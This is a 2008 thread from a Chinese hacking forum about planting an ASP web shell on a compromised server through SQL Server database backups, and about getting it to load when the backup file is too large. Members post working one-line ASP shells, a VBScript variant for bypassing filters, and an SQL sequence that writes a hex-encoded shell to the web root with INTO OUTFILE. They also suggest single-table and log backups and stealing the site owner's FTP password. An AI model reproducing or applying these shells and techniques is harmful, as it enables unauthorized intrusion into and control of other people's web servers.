文章作者：redbin

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）


数据库过大导致bak出的小马也太大，从而导致无法连接，有什么好办法？

<%eval(request("a")):response.end%>
<%eval(request("a"))%>
<%execute request("a")%>
全部尝试过
用那个结束语句也不可以，每次都drop掉一下新BAK，
测试过BAK成txt  下回来有9M多，改成ASP放自己服务器测试下确实由于过大，而且屏蔽了错误返回信息，从而导致连接不上！不知道各位有什么高见可以让BAK出的小一些呢？小了肯定就可以访问了，或者有什么方法可以能让可以连上即可！


ps:可以列目录但是找不到后台，已经手工测试了那个所谓的后台目录近百个文件！

QQ 35475

[ 本帖最后由 redbin 于 2008-4-29 02:02 编辑 ]

其实不必备份整个数据库的.备份个别的表也行的.具体百度一下吧.

log备份出来的马好象只有70几K
而且原先数据库中不能有 "<%" 字符,不然一样连接不上.
我就记得这些了

差异。



备份。

看一下可不可以跨库，备份别的库试一下。

貌似碰到过这样的问题，  “屏蔽了错误返回信息”这个在服务器上是他自己自定义错误。
“可以列目录但是找不到后台” 好像是把后台删了，他自己机登陆后台管理时再FTP上传。
看他用的DD 是开源的不？ 运气好的话 把FTP 密码搞过来，替他上传后台文件。。。
那点不对请批评指正。。。

NBSI快多了 。

%%被过滤的时候考虑下 <script language=vbscript runat=server>execute request("#")</script>

你们回复只有一个同学说到了点
备份一个表
其他的也不看看楼主是什么人
汗！

导出一个表看看效果！

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(0x3C25657865637574652872657175657374282261222929253EDA);
select cmd from a into outfile 'X:\WEB\1.asp';
Drop TABLE IF EXISTS a;
0x3C25657865637574652872657175657374282261222929253EDA是LAKE的一句话,密码为a
在PHP环境里我成功过,不知道ASP怎么样
MS在注入点后执行的话要加个;
如果是字符型的话还要加多个点'

遇到过这样的问题 也没成功过 数据库过大 备份总是连接超时...

截断啊截断

建个模拟目录然后新建一个表，插入一句话，再把这个表备份到模拟目录试试

截断了就好了

被过滤了 可以试下  http://一句话com

baidu了蛮久也没发现怎么BK单个表    谁把语句说一下

好像新建一个表去备份吧

我是水晶。可以结贴了。